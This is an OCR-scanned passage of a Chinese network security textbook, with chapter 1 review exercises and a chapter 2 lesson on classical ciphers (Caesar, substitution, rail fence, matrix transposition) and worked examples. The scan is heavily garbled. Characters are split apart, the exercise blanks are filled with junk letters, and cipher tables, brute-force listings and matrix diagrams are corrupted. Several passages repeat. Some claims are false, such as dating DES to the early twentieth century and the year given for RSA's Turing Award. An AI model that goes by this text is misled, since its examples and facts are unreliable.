方面 是 在 与 威胁 的 对 抗 和 研判 中 ,不 断 提 升 自身 能 力 ; 另 一 方面 是 不 断 实 现 对 错误 的 观念 
与 方法 的 扬弃 ,从 而 达成 持续 进步 。 

习近平 总 书记 指出 ,网 络 安全 是 “整体 的 而 不 是 割裂 的 “是 动态 的 而 不 是 静态 的 “是 开 
放 的 而 不 是 封闭 的 “是 相对 的 而 不 是 绝对 的 “是 共同 的 而 不 是 孤立 的 "。 我 们 要 突破 网 络 
安全 核心 技术 ,形成 有 效 防护 能 力 ,就 要 尊重 网 络 安 全 的 整体 性 、 动 态 性 、 开 放 性 、 相 对 性 和 
共同 性 。 

习近平 总 书记 指出 ,安全 和 发 展 要 同步 推进 。 我 国信 息 化 建设 成 就 全 球 瞩 目 , 但 网 络 安 
全 长 期 没有 同步 推进 。 当 前 物 联网 等 新 兴 产 业 正在 兴起 ,有 效 落实 同步 推进 安全 发 展 的 要 
求 ,能够 促进 新 兴 产 业 崛 起 ,形成 安全 的 规划 与 设计 ,为 新 兴 产 业 发 展 注入 安全 的 基因 。 

(3) 落实 全 天 候 全 方位 感知 网 络 安全 态势 的 要 求 ,树立 动态 、 综 合 的 防护 理念 。 

总 书记 指出 ,关键 信息 基础 设施 是 网 络 安全 的 重 中 之 重 ,也 是 可 能 遭 到 重点 攻击 的 目 
标 , 要 求 我 们 全 天 候 、 全 方位 感知 网 络 安全 态势 。 


习 题 1 


1.1 网 络 安全 定义 
1. 网 络 安全 是 ( js 
2. 网 络 安全 是 ( 。”) 和 ( ) 的 有 机 结合 。 理 解 网 络 安全 的 关键 是 ( ) 
3. 网 络 安全 教学 内 容 包 括 ( 过 YR yt )sC )5 个 部 分 。 
本 ya jt ) 称 为 信息 安全 的 三 要 素 。 
5. 网 络 安全 划分 为 ( 次; js Da ) 和 ( )5 个 层次 
6. 常见 的 网 络 安全 设备 有 哪些 ? 主要 功能 是 什么 ? 
7. DMZ 是 ( ),DMZ 网 络 必须 遵守 的 6 条 访问 控制 策略 是 什么 ? 
8. 请 说 明 图 1-5 中 网 络 安全 设备 如 何 保证 网 络 运行 安全 。 
9. 网 络 安全 的 主要 目标 是 什么 ? 
1.2 网 络 安全 的 重要 性 
1. 简 述 震 网 病毒 的 具体 攻击 过 程 。 
2. 请 举 出 一 个 个 人 隐私 泄露 的 案例 ,分 析 案 例 中 包含 了 哪些 网 络 安全 教学 内 容 。 
3. 棱镜 计划 对 我 国 加 强 网 络 安全 的 启示 有 哪些 ? 
4. APT 攻击 是 ( ys 
5. 0day 漏洞 是 指 没有 发 布 公开 补丁 的 漏洞 ,包括 ( yx Yak )。 特 征 是 用 
户 对 此 类 漏洞 ( Xk 
6. 举例 说 明 APT 攻击 具有 的 特征 。 
7. 如 何 理解 没有 网 络 安全 就 没有 国家 安全 ? 
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8. 个 人 隐私 指 ( )。 隐 私 的 范围 包括 ( ) 和 ( Ds 

9. 举例 说 明 个 人 隐私 主要 涉及 的 4 个 范畴 。 

10. 提供 公民 个 人 信息 情节 严重 的 认定 标准 包括 非法 获取 、 出 售 或 者 提供 行踪 轨迹 信 
息 、 通 信 内 容 \ 征 信人 信息、 财产 信息 ( ) 以 上 的 ; 非法 获取 、 出 售 或 者 提供 住宿 信息 、 通 信 
记录 ,健康 生理 信息 、 交 易 信 息 等 其 他 可 能 影响 人 身 、 财 产 安全 的 公民 个 人 信息 ( ) 以 上 
的 ; 非法 获取 、 出 售 或 者 提供 前 两 项 规定 以 外 的 公民 个 人 信息 ( ) 以 上 的 ; 违法 所 得 ( ) 
以 上 等 。 

1.3 网 络 安全 评价 

1. P2DR2 各 字母 对 应 的 单词 是 ( Yk 区 7 Js ) ,对 应 的 汉语 
意思 是 ( Yat Wt Yk ) )。 它 们 组 成 一 个 完整 的 、 动 态 的 安全 循环 。 

2. 网 络 安全 概念 中 安全 的 定义 是 ( hs 

3. 解决 安全 问题 的 有 效 途 径 是 ( ys 

4. P2DR2 的 主要 内 容 是 什么 ? 试 从 时 间 域 和 策略 域 对 其 进行 分 析 。 

5. 商用 的 操作 系统 属于 TCSEC 的 C2 安全 级 别 。 在 连接 到 网 络 上 时 ,C2 系统 的 用 户 
( )。C2 系统 通过 ( ) 来 增强 这 种 控制 。 

6. 我 国 计 算 机 安全 保护 的 5 个 等 级 要 求 分 别 是 什么 ? 

1.4 《网 络 安全 法 》 

1.《 网 络 安全 法 》 确 立 了 哪些 基本 原则 ? 

2. 要 树立 正确 的 网 络 安全 观 , 应 当 把 握 好 哪 6 个 方面 的 关系 ? 
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8. 个 人 隐私 指 ( )。 隐 私 的 范围 包括 ( ) 和 ( Ds 

9. 举例 说 明 个 人 隐私 主要 涉及 的 4 个 范畴 。 
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记录 ,健康 生理 信息 、 交 易 信 息 等 其 他 可 能 影响 人 身 、 财 产 安全 的 公民 个 人 信息 ( ) 以 上 
的 ; 非法 获取 、 出 售 或 者 提供 前 两 项 规定 以 外 的 公民 个 人 信息 ( ) 以 上 的 ; 违法 所 得 ( ) 
以 上 等 。 

1.3 网 络 安全 评价 

1. P2DR2 各 字母 对 应 的 单词 是 ( Yk 区 7 Js ) ,对 应 的 汉语 
意思 是 ( Yat Wt Yk ) )。 它 们 组 成 一 个 完整 的 、 动 态 的 安全 循环 。 

2. 网 络 安全 概念 中 安全 的 定义 是 ( hs 

3. 解决 安全 问题 的 有 效 途 径 是 ( ys 

4. P2DR2 的 主要 内 容 是 什么 ? 试 从 时 间 域 和 策略 域 对 其 进行 分 析 。 

5. 商用 的 操作 系统 属于 TCSEC 的 C2 安全 级 别 。 在 连接 到 网 络 上 时 ,C2 系统 的 用 户 
( )。C2 系统 通过 ( ) 来 增强 这 种 控制 。 

6. 我 国 计 算 机 安全 保护 的 5 个 等 级 要 求 分 别 是 什么 ? 

1.4 《网 络 安全 法 》 

1.《 网 络 安全 法 》 确 立 了 哪些 基本 原则 ? 

2. 要 树立 正确 的 网 络 安全 观 , 应 当 把 握 好 哪 6 个 方面 的 关系 ? 
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本 章 学 习 要 求 

掌握 对 称 密码 (凯撒 密码 、 栅 栏 密码 `.DES) 使 用 方法 `.DES 对 称 密码 算法 ; 
掌握 RSA 加 密 用 法 和 签名 用 法 .RSA 公 钥 密码 算法 ; 

掌握 椭圆 曲线 加 法 规则 和 倍 点 计算 方法 、 椭 圆 曲线 密码 原理 ; 

掌握 混合 密码 系统 使 用 方法 、 对 称 密 钥 分 发 方法 、 密 码 学 语言 ; 

掌握 身份 认证 和 消息 认证 .MD5 算法 ; 

掌握 国 密 密 码 使 用 方法 ,认识 国 密 密 码 的 优点 ; 

掌握 应 用 密码 学 知识 保护 网 上 银行 支付 安全 。 
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2.1 密码 学 定义 


密码 学 是 研究 数据 变换 (加 密 .解密 .摘要 等 ) 的 科学 ,是 数学 和 计算 机 的 交叉 学 科 , 和 信 
息 论 密切 相关 。 

密码 学 常用 的 两 个 数据 变换 方法 是 : 

(1) 替代 Csubstitution cipher) ,按照 一 定 规 则 将 一 组 字符 (字母 ) 换 成 其 他 字符 。 例 如 
“fly at once” 变 成 “gmz bu podf”( 每 个 字母 用 下 一 个 字母 蔡 代 ,凯撒 密码 )。 替 代 的 特点 是 
字母 形式 发 展 了 变化 ,但 字母 所 在 位 置 不 变 , 即 字符 变 , 位 置 不 变 。 

(2) 置换 (transposition cipher) ,将 字符 位 置 ( 字 母 顺 序 ) 重 新 排列 ,例如 “come here” 变 
成 “choemree”(4 个 字母 一 行 写成 两 行 , 按 列 重新 书写 ,栅栏 密码 )。 置 换 的 特征 是 字母 所 在 
位 置 发 展 了 变化 ,但 字母 形式 不 变 , 即 位 置 变 , 字 符 不 变 。 

直观 地 讲 ,变换 就 是 把 具有 明确 含义 的 字符 串 ( 英 文 单词 ) 变 换 为 无 明确 含义 的 字符 串 ， 
从 而 实现 隐藏 信息 涵义 的 目的 。 或 者 说 是 研究 如 何 将 机 密 信息 进行 特殊 的 编码 ,以 形成 不 
可 识别 的 密码 形式 ( 密 文 ) 进 行 传递 。 

根据 信息 论 , 变 换 增加 了 字符 串 含 义 的 不 确定 性 ,信息 炉 值 增 加 。 例 如 字符 串 “fly at 
once” 具 有 明确 含义 ,字符 串 “gmz bu podf" 则 需要 多 次 尝试 才能 确定 其 含义 。 

密码 学 的 发 展 经 历 了 古典 密码 、 近 代 密 码 、 现 代 密 码 3 个 发 展 阶段 : 

(1) 古典 密码 阶段 ,从 古代 到 19 世纪 末 , 长 达 几 千年 。 密 码 体 制 为 纸 、 笔 或 者 简单 器 械 
实现 的 简单 替代 及 置换 ,通信 手段 为 信使 ,例如 凯撒 密码 ,栅栏 密 码 等 。 

(2) 近代 密码 阶段 ,从 20 世纪 初 到 20 世纪 50 年 代 。 密 码 体制 为 手工 或 电动 机 械 实现 
的 复杂 的 替代 及 置换 ,通信 手段 为 电报 通信 ,例如 DES 密码 。 这 一 阶段 密码 只 在 很 小 范围 
内 使 用 ,如 军事 、 外 交 、 情 报 等 部 门 。 

(3) 现代 密码 阶段 ,从 20 世纪 50 年 代 至 今 。 密 码 体 制 : 分 组 密码 .序列 密码 以 及 公开 
密 钥 密码 ,有 坚实 的 数学 理论 基础 。 通 信和 手段 包括 无 线 通 信 、 有 线 通 信 、 计 算 机 网 络 等 。 
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1949 年 Shannon 发 表 题 为 “保密 通信 的 信息 理论 ”的 论文 ,将 数学 (概率 论 ) 引 入 了 密码 
学 ,为 密码 系统 建立 了 理论 基础 ,从 此 密码 学 成 了 一 门 科学 ,实现 了 第 一 次 飞跃 。 

1976 年 后 ,美国 数据 加 密 标准 (DES) 的 公布 使 密码 学 的 研究 公开 ,标志 着 密码 学 从 军 
用 转向 军民 两 用 ,扩大 了 密码 学 应 用 范围 ,密码 学 得 到 了 迅速 发 展 。 

1976 年 ,Diffie 和 Hellman 在 文章 “密码 学 新 方向 ”(New Direction in Cryptography) 中 
首次 提出 了 公开 密 钥 密码 体制 的 思想 ,1977 年 ,Rivest、Shamir 和 Adleman 三 个 人 实现 了 公 
开 密 钥 密 码 体制 (RSA 公开 密 钥 体制 ,RSA 为 三 人 名 字 首 字母 的 缩写 ,三 人 共同 获得 2015 年 
图 灵 奖 者 ) ,解决 了 密 钥 分 配 .身份 认证 问题 ,实现 了 密码 学 的 第 二 次 飞跃 。 

公 钥 密码 体制 算法 以 数学 难题 为 基础 ,要 求 进行 复杂 的 计算 ,使 得 必须 将 计算 机 引入 密 
码 学 。 

经 过 发 展 ,密码 学 不 仅仅 是 编码 与 破译 的 学 问 ,而 且 包 括 安 全 管理 ,安全 设计 秘密 分 
存 、Hash 函数 等 内 容 , 已 被 有 效 地 、 系 统 地 用 于 保证 信息 的 保密 性 、 完 整 性 和 真实 性 。 保 密 
性 是 对 信息 进行 加 密 ,使 非法 用 户 无 法 读 懂 数 据 信 息 。 完 整 性 是 对 数据 完整 性 的 鉴别 ,以 确 
定数 据 是 否 被 非法 算 改 ,保证 合法 用 户 得 到 正确 完整 的 信息 。 真 实 性 是 数据 来 源 的 真实 性 、 
信息 本 身 真实 性 的 鉴别 ,可 以 保证 合法 用 户 不 被 欺骗 。 

密码 学 广泛 应 用 于 日 常生 活 , 包 括 自动 柜员 机 的 芯片 卡 、 计 算 机 使 用 者 存 取 密码 、 电 子 
商务 等 。 


2.1.1 凯撒 密码 


凯撒 密码 是 历史 上 第 一 个 密码 技术 ,是 古 罗 马凯 撒 (CCaesare) 大 帝 在 营救 西 塞 罗 战 役 时 
用 来 保护 重要 军情 的 加 密 系统 。 

凯撒 密码 使 用 替代 变换 方法 ,可 分 为 古典 凯撒 密码 和 广义 凯撒 密码 两 种 。 

1. 古典 凯撒 密码 

古典 凯撒 密码 的 变换 规则 是 : 将 字符 串 中 当前 字符 用 字母 表 中 其 后 的 第 3 个 字母 替 
代 ,x、y、z 依 次 用 a、b、c 替代 ,实现 数据 加 密 ; 将 字符 串 中 当前 字符 用 字母 表 中 其 前 的 第 
3 个 字母 替代 ,a、b、c 依次 用 x、y、z 替代 ,实现 数据 解密 。 

本 章 约定 字符 串 仅 由 英文 小 写字 母 构成 ,不 考虑 ASCII 码 表 其 他 字符 ,统一 将 大 写字 
母 转化 为 小 写字 母 。 

定义 变换 前 的 字符 串 为 明文 (plain text) ,变换 后 的 字符 串 为 密 文 (cipher text) , 则 变换 
规则 可 以 直观 地 表示 为 一 张 字符 替代 表 , 如 表 2-1 所 示 。 

表 2-1 古典 凯撒 密码 明文 、 密 文字 符 蔡 代表 


明文 字符 abcdefghijklmnopqrstuvwxyz 
密 文 字符 defghijklmnopqrstuvwxyzabec 


数据 加 密 时 ,用 户 对 明文 中 的 每 一 个 字母 ,依次 查找 表 2-1 中 “明文 字符 ” 行 所 在 的 位 
置 ,然后 写 出 “* 密 文字 符 ” 行 对 应 的 字母 ,就 可 生成 密 文 ; 数据 解密 时 ,用 户 通过 对 密 文 中 的 
每 一 个 字母 ,依次 查找 表 2-1 中 “ 密 文字 符 ” 行 所 在 的 位 置 ,然后 写 出 “明文 字符 ” 行 对 应 的 字 
母 , 就 可 生成 明文 。 因 此 古典 凯 撤 密码 是 单 表 替代 密码 的 典范 。 
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古典 凯 撤 密码 可 以 用 字母 移 位 操作 实现 : 数据 加 密 时 ,将 字母 按 字 母 表 顺 序 向 右 移 
3 位 ; 数据 解密 时 ,将 字母 按 字 母 表 顺 序 向 左 移 3 位 。 

【 例 2-1】 明文 pi 二 this is a book 使 用 古典 凯 撤 密码 加 密 , 求 密 文 c。 

解 : 查 表 2-1 可 得 ,t>w,h>k,i>l,i>l,s>v,a>d,b>e,o 了 >r,k>n, 所 以 ci 二 wklv lv 
d errn。 

【 例 2-2】 古典 凯 撤 密码 加 密 的 密 文 c: 一 zh duh vwxghqwv, 求 明文 名。 据 此 说 明 替 代 
密码 的 特征 。 

解 : 查 表 2-1 可 得 ,zw,h 一 e,d 一 au 一 Tryv 一 sw 一 t,x 一 ug 一 dh 一 eq 一 ny 所 以 
思 一 we are students。 

替代 密码 的 特征 是 字符 变 ,位置 不 变 。 

由 例 2-1 和 例 2-2 可 知 ,古典 凯 撤 密码 明文 和 密 文 存在 一 一 对 应 关系 , 密 文 的 安全 性 依 
赖 于 保密 变换 规则 。 

2. 广义 凯撒 密码 

广义 凯撒 密码 的 变换 规则 是 : 将 字符 串 中 当前 字母 用 字母 表 中 其 后 的 第 nn 个 字母 蔡 
代 , 实 现 数据 加 密 ; 将 字符 串 中 当前 字母 用 字母 表 中 其 前 的 第 个 字母 蔡 代 ,实现 数据 解 

密码 学 中 一 般 约 定 凯撒 密码 指 广义 凯撒 密码 ,使 用 古典 凯撒 密码 会 明确 标注 。 

变换 规则 中 的 ” 称 为 密 钥 人 ,规定 AE {1,2,3,4,5,…,23,24,25}。A 一 3 时 ,广义 凯撒 
密码 退化 为 古典 凯 撤 密码 。& 取 不 同 值 时 ,对 应 不 同 的 字符 替代 表 , 数 据 加 密 、 解 密 需要 查 
找 对 应 字符 替代 表 , 因 此 凯撒 密码 属于 多 表 替 代 密 码 。 k= 二 5、21 时 ,字符 替代 表 如 表 2-2、 
表 2-3 所 示 。 

表 2-2 凯撒 密码 明文 、 密 文字 符 震 代表 (k= 二 5) 
明文 字符 abcdefghijklmnopqrstuvwxyz 





密 文字 符 fghijklmnopqrstuvwxyzabcde 


表 2-3 凯撒 密码 了 明文、 密 文字 符 苦 代 表 (k==21) 
明文 字符 abcdefghijklmnopqrstuvwxyz 





密 文 字符 vwxyzabcdefghijklmnopqrstu 





【 例 2-3】 pi 二 this is a book, 使 用 凯撒 密码 加 密 , 求 k= 二 3、5 时 ci 、cs。 

解 : “k= 二 3 .… 查 找 表 2-1, 可 得 cj 二 wklv lv d errn; 

““ 二 5 .查找 表 2-2, 可 得 cy 二 ymnx nx f{ gttp。 

【 例 2-4】〗】 二 5 时 ,凯撒 密码 加 密 的 密 文 cs 二 bj fwj xyzijsyx, 求 ps。 

解 :““ k= 二 5, .查找 表 2-2, 可 得 ps 二 we are students。 

【 例 2-5】 凯撒 密码 加 密 的 密 文 cs 二 bj fwj xyzijsyx, 求 & 一 21 时 使 用 凯撒 密码 加 密 的 
结果 p。 

解 :““ k= 二 21,.…. 查 找 表 2-3, 可 得 p, 一 we are students。 

对 比例 2-4 和 例 2-5 可 知 ,解密 既 可 以 用 解密 变换 规则 实现 ,也 可 以 用 加 密 变 换 规则 实 
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现 。 因 此 凯撒 密码 加 密 和 解密 是 相对 的 ,可 以 互相 替代 ,加 密 变 换 规则 和 解密 变换 规则 本 质 
上 都 是 移 位 ,只 是 移 位 的 方向 不 同 ; 或 者 说 都 是 查 表 ,只 是 查 的 表 不 同 而 已 。 

对 比 表 2-2 和 表 2-3 可 知 , 将 两 表 中 任意 一 张 的 上 下 两 行 互 换 重 新 按 字母 顺序 排列 就 
可 得 出 另 一 张 表 ,或 者 说 两 张 表 中 字母 的 对 应 关系 是 固定 的 ,例如 a 对 应 v,b 对 应 w，…… 

真实 的 密码 解密 是 不 知道 密 钥 的 ,这 也 是 解密 的 魅力 所 在 。 探 索 不 知道 密 钥 前 提 下 准 
确 解密 凯撒 密 文 ,对 于 提高 读者 深入 理解 密码 学 .锻炼 分 析 问 题 能 力 、 提 高 编程 能 力 大 有 
益处 。 

【 例 2-6】 凯 撤 密码 加 密 的 密 文 c: 一 yt gj tw sty yt gj,ymfy nx ymj vzjxynts, 求 明 


文 ps。 
解 : … 密 钥 未 知 。 
.使 用 暴力 破解 方法 ( 穷 举 法 ) 破 解密 文 。 
依次 查找 二 1、2、…… 、25、26 时 对 应 字符 蔡 代 表 得 出 对 应 明文 。 


key=1,ps=xs fi sv rsx xs fi,xlex mw xli uyiwxmsr; 
key=2,ps=wr eh ru qrw wr eh,wkdw lv wkh txhvwlrq; 
key=3,ps=vq dg qt pqv vq dg,vjcv kpub vjg swguvkqp; 
key=4,ps=up cf ps opu up cf,uibu jt uif rvftujpor; 
key=5,ps=to be or not to be,that is the question; 
key=6,ps3=sn ad nq mns sn ad,sgzs hr sgd ptdrshnm:; 
key=7,ps3=rm zc mp lmr rm zc,rfyr gq rfc oscqrgml; 
key=8,ps=ql yb lo klq ql yb,qexq fp qeb nrbpqflk; 
key=9,ps3=pk xa kn jkp pk xa,pdwp eo pda mqaopekj; 
key=10,p3=0) wz jm ijo oj wz,ocvo dn ocz lpznodji; 
key=11,ps=nivy il hin ni vy,nbun cm nby koymncih; 
key=12,ps=mh ux hk ghm mh ux,matm bl max jnxlmbhg; 
key=13,ps=lg tw gj fgl lg tw,lzsl ak lzw imwklagf; 
key=14.p:3= kf sv fi efk kf sv,kyrk zj kyv hlvjkzfe; 
key=15,p;=je ru eh dej je ru,jxqj yi jxu gkuijyed; 
key=16,p:s=id qt dg cdi id qt,iwpi xh iwt fjthixde; 
key=17,ps=he ps cf bch he ps,hvoh wg hvs eisghwcb; 
key=18,ps=gb or be abg gb or,gung vf gur dhrfgvba; 
key=19,ps=fa nq ad zaf fa nq,ftmf ue ftq cgqefuaz; 
key=20,ps3=ez mp zc yze ez mp:esle td esp bfpdetzy; 
key=21,ps=dy lo yb xyd dy lo,drkd sc dro aeocdsyx; 
key=22,ps=cx kn xa wxc cx kn,cqjc rb cqn zdnbcrxw; 
key=23,ps=bw jm wz vwb bw jm bpib qa bpm ycmabqwv; 
key=24,ps—=av il vy uva av il,aoha pz aol xblzapvu; 
key=25,ps=zu hk ux tuz zu hk,zngz oy znk wakyzout; 
key=26,ps—=yt gj tw sty yt gj,ymfy nx ymj vzjxynts。 
比较 以 上 答案 发 现 ， 
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(1) key 二 5 时 ,ps 二 to be or not to be,that is the question ,每 个 字符 串 都 有 确切 含义 
(都 是 单词 ) ,ps 具有 确定 的 含义 ,所 以 为 正确 答案 。 

(2) key 一 25 时 ,ps 二 cs ,完成 了 一 轮 循 环 , 结 果 开 始 重复 ,暴力 破解 结束 。 

(3) 26 种 ps 中 任 一 位 置 的 字符 (如 第 一 个 字符 ) 会 规律 性 遍历 26 个 字母 。 

从 多 个 可 能 明文 中 选择 出 正确 明文 的 原则 是 : 统计 可 能 明文 中 出 现 单词 个 数 的 多 少 ， 
以 个 数 多 的 明文 为 正确 答案 。 理 想 状 态 下 ,正确 答案 是 一 个 具有 确定 含义 的 句子 。 

由 例 2-6 可 知 凯 撤 密码 引入 了 密 钥 的 概念 ,强调 了 密 钥 的 重要 性 : 

(1) 明文 和 密 文 变 为 一 对 多 的 关系 。 同 一 个 明文 使 用 不 同 的 密 钥 ,会 产生 多 个 不 同 的 
密 文 , 增 加 了 根据 密 文 解密 明文 的 难度 。 

(2) 密码 加 密 、 解 密 不 仅 与 变换 规则 有 关 , 而 且 与 密 钥 相关 ,仅仅 知道 变换 规则 和 密 文 、 
不 给 定 密 钥 (无 密 钥 ) ,就 不 能 唯一 确定 明文 (不 确定 性 增加 , 炉 增 加 )。 

(3) 密 文 的 安全 性 可 以 不 依赖 于 保密 变换 规则 ,而 是 依赖 于 密 钥 的 保密 。 因 此 保密 变 
换 规则 可 以 公开 ,以 扩大 密码 使 用 范围 ,这 是 密码 学 发 展 的 必然 。 

一 个 密码 系统 可 能 使 用 的 密 钥 集合 , 称 为 密 钥 空间 , 记 为 大 写 K。 凯 撒 密 码 的 密 钥 空 
间 K= 二 {1,2,3,…,25}, 密 钥 空间 大 小 为 25。 这 意味 着 ,对 于 任意 一 个 凯撒 密码 加 密 的 密 
文 ,解密 都 需要 考虑 25 种 情况 。 

为 了 加 大 凯撒 密码 的 密 钥 空间 ,可 以 采用 单字 母 蔡 代 密码 。 单 字母 替代 密码 也 是 一 种 
多 表 替 代 算 法 ,是 将 密 文 字母 的 顺序 打 乱 后 与 明文 字母 对 应 生成 字符 蔡 代表, 例如 表 2-4。 


表 2-4 单字 母 蔡 代 密码 明文 , 密 文字 符 蔡 代表 


明文 字符 abcdefghijklmnopqrstuvwxyz 
密 文 字符 ogrfcysalxubzqtwdvehjmkpni 


【 例 2-7】〗 pi 二 this is a book 使 用 单字 母 蔡 代 密码 ( 见 表 2-4) 加 密 , 求 ci 。 

解 : 查 表 2-4 可 得 ,t>h,h->a,i>1,s>e,a>0,b>g,o>t,k>u, 所 以 ci 二 hale le o gttu。 

单字 母 替 代 密 码 的 密 钥 空间 大 小 为 26! 4X10*( 明 文字 符 a 可 从 26 个 字母 中 任 选 1 
个 字母 替代 ,明文 字符 b 从 明文 字符 a 选 剩 下 的 25 个 字母 中 任 选 1 个 字母 替代 ，…… )。 使 
用 人 脑 进行 暴力 破解 显然 不 可 能 。 即 使 使 用 每 微 秒 尝试 一 个 密 钥 的 计算 机 进行 暴力 破解 ， 





安全 性 的 方法 之 一 。 
综 上 所 述 ,替代 密码 可 以 使 用 移 位 运算 或 查 表 运 算 实现 ,具有 字符 变 , 位 置 不 变 的 特征 。 
加 密 .解密 规则 可 以 互相 推出 ,加 密 密 钥 、 解 密 密 钥 相 同 。 


2.1.2 栅栏 密码 


典型 的 置换 密码 有 栅栏 密码 和 矩阵 置换 密码 。 

1. 栅栏 密码 

栅栏 密码 的 加 密 变 换 规则 是 首先 将 明文 分 成 个 字符 一 栏 ,一 栏 为 一 行 构成 一 个 行列 
式 ; 然后 行列 式 行列 转 置 后 按 列 上 下 排列 字符 生成 密 文 。 

将 n==2 的 栅栏 密码 称 为 2 栏 栅栏 密码 ,要求 明文 去 除 空格 后 长 度 为 偶数 。 
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【 例 2-8〗 pi 二 there is a cipher, 使 用 2 栏 栅栏 密码 加 密 , 求 ci 。 
解 : (1) 去 空格 ,pi 二 thereisacipher。 
(2) 2 个 字符 一 栏 ,th,er,ei,sa,ci,ph,er。 


th 
Cr 
el ” 
SC 
(3) 生成 行列 式 : | sa 年 降 行 列 转 时 ,得 [ Ed: 
_ hriaihr 
Le 
ph 
er 


(4) 合并 ,ci 一 teescpehriaihr。 分 出 空格 ,ci 一 teesc pe h riaihr。 

解密 变换 规则 是 首先 将 密 文 分 成 n 行 构成 一 个 行列 式 ; 然后 行列 式 行列 转 置 后 按 行 排 
列 字符 生成 密 文 。 

【 例 2-9】 已 知 使 用 2 栏 栅栏 密码 加 密 的 密 文 ci 二 teesc pe h riaihr, 求 明文 户 。 

解 : (1) 去 掉 cy 中 的 空格 ,cy 一 teescpehriaihr。 


(2) 密 文 从 中 间 分 开 , 变 为 两 行 ， sn ,二 阵 行列 转 轩 ,得 | 
hriaihr . 
Cl 
ph 
er 


(3) 合并 ,pi 二 thereisacipher。 分 出 空格 ,pi 二 there is a cipher。 

不 是 所 有 的 栅栏 密码 都 是 2 栏 的 ,还 有 多 栏 栅栏 密码 。2 栏 栅栏 密码 通常 会 明确 标 出 。 

多 栏 央 栏 密码 加 密 、 解 密 首先 需要 计算 字符 串 ( 明 文 或 密 文 ) 可 以 分 解 为 几 栏 ,然后 分 别 
进行 加 密 、 解 密 。 如 字符 串 长 度 L=14= 二 2X7, 说 明 可 分 成 2 个 字符 一 栏 和 7 个 字符 一 栏 两 
种 情况 。 

【 例 2-10】 已 知 明文 pi 二 there is a cipher, 使 用 多 栏 栅 栏 密码 加 密 , 求 密 文 ci 。 

(1) 去 空格 ,pi 二 thereisacipher。 

(2) 分 栏 ,L 二 14 二 2X7, 说 明 可 分 成 2 个 字符 一 栏 和 7 个 字符 一 栏 两 种 情况 。 

(3) 7 个 字符 一 栏 ,thereis,acipher 写成 两 行 : 


thereis 
( ee ] 短 隆 行列 转 轩 ,得 rp |. 
acipher 

sr 


合并 ,pi 二 tahceirpehiesr。 分 出 空格 ,pi 二 tahce ir p ehiesr。 
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(4) 2 个 字符 一 栏 时 ,结果 见 例 2-8。 

【 例 2-11】 已 知 使 用 多 栏 栅栏 密码 加 密 的 密 文 ci 一 teesc pe h riaihr, 求 明文 pl。 

解 : (1) 去 掉 cy 中 的 空格 ,ci 二 teescpehriaihr。 

(2) 计算 ci 的 长 度 工 ,并 分 解 为 工 为 两 个 自然 数 的 乘积 。L 二 14 二 2X7, 说 明 可 分 成 
2 个 字符 一 栏 和 7 个 字符 一 栏 两 种 情况 。 

(3) 7 个 字符 一 栏 : 


本 teescpe 
变 为 两 列 : | sa . 扯 阵 行列 转 轩 ,得 | | 


hriaihr 


er 

合并 ,pi 二 thereisacipher。 分 出 空格 ,pi 二 there is a cipher。 

(4) 2 个 字符 一 栏 ,结果 见 例 2-9。 

2. 和 矩阵 置换 密码 

矩阵 置换 密码 通过 置换 矩阵 控制 其 输出 方向 和 输出 顺序 来 获得 密 文 。 例 如 ,置换 矩阵 
12345 
ee 
出 矩阵 的 第 4 列 …… 

加 密 变换 规则 ， 

(1) 首先 计算 置换 矩阵 列 数 z, 将 明文 分 成 于 个 字符 一 行 构成 明文 矩阵 ; 

(2) 将 明文 行列 式 按 置换 矩阵 生成 输出 矩阵 ; 

(3) 输出 矩阵 按 行 次 序 顺 序 排列 生成 密 文 。 
12345 
24513 


| 表示 将 明 文 拓 隆 的 第 1 列 置换 为 输出 和 矩阵 的 第 2 列 , 明 文 矩阵 的 第 2 列 置换 为 输 


【 例 2-12】 加 密 置换 矩阵 s-| 


| 一 now we are having a test, 求 cl 。 


nowwe 
areha 
解 : (1) 由 巨 可 知 ?7 一 5, 明 文 矩阵 为 : | . 
vinga 
testx 
(最 后 一 行 不 足 长 度 5, 加 原文 中 未 使 用 的 任 一 字符 ,如 xz。) 
wneow 
haare 
(2) 置换 ,得 输出 矩阵 | 
gvain 


ttxes 
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12345 12345 
nowwe |[ 12345 ]| wneow 
置换 过 程 为 : | areha (2513| haare |。 
vinga E gvain 
testx ttxes 


(3) 输出 密 文 ,ci 二 wne ow haa regvai n ttxe。 
解密 变换 规则 : 


(1) 计算 置换 矩阵 列 数 ,将 密 文 分 成 个 字符 一 行 构成 密 文 和 矩阵 ; 


(2) 将 密 文 矩 阵 按 置 换 矩 阵 生成 输出 矩阵 ; 
(3) 输出 矩阵 按 行 次 序 顺序 排列 生成 明文 。 


12345 
【 例 2-13] 解密 胃 换 征 阵 中 | 
41523 
wneow 
解 : (1) 由 可 知 % 一 5, 密 文 给 阵 为 ,| Peer 
gvain 
ttzex 
(最 后 一 行 不 足 长 度 5, 加 原文 中 未 使 用 的 任 一 字符 ,如 z。) 
nowwe 
(2) 置换 ,得 输出 垂 阵 | ee |。 
vinga 
Zestx 
12345 12345 
wneow |[ 12345 || nowwe 
置换 过 程 为 : | haare ea areha |。 
gvain D vinga 
ttxez testx 


(3) 输出 明文 ,pi 二 now we are having a test。 
比较 以 上 两 例 ,可 得 加 密 和 矩阵 已 和 解密 矩阵 D 可 相互 转换 


大 排列 , 即 得 D; 反之 亦 然 。 
mw | 
E= SD 
24513 41523 


【 例 2-14】 n= 二 5,c 二 wynoo reuha inagv esatt, 求 pi。 
wynoo 
reuha 
解 : (1) "一 5, 密 文 矩 阵 为 : | . 。 
inagv 


esatt 


| 二 wne ow haa regvai n ttze, 求 Pi 。 


: 将 E 两 行 互 换 , 青 从 小 到 
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nowyo 
uareh 
(2) 置换 ,得 输出 矩阵 | . 
aving 
atest 
wynoo ?3973 
pa | 12345 es 
置换 过 程 为 : | "Lz222?] | 
inagv ?7773 
esatt 寺中 过 守 过 


在 本 题解 题 过 程 中 ,我们 不 知道 具体 的 解密 矩阵 ,因此 需要 尝试 各 种 排列 找到 正确 的 解 
密 矩 阵 。z 一 5 时 可 能 的 解密 矩阵 总 数 为 5! 一 120, 从 中 找 出 正确 的 解密 矩阵 对 人 脑 而 言 已 
具有 一 定 难度 ,需要 使 用 计算 机 辅助 选择 。 正 确 结果 为 : 


wynoo nowyo 
12345 
reuha uareh 
34152 
inagv aving 
D 
esatt atest 


置换 密码 位 置 变 , 字 符 不 变 ; 替代 密码 字符 变 , 位 置 不 变 。 组 合 置换 密码 和 替代 密码 就 
可 实现 位 置 .字符 同时 改变 ,增加 密码 解密 难度 。 

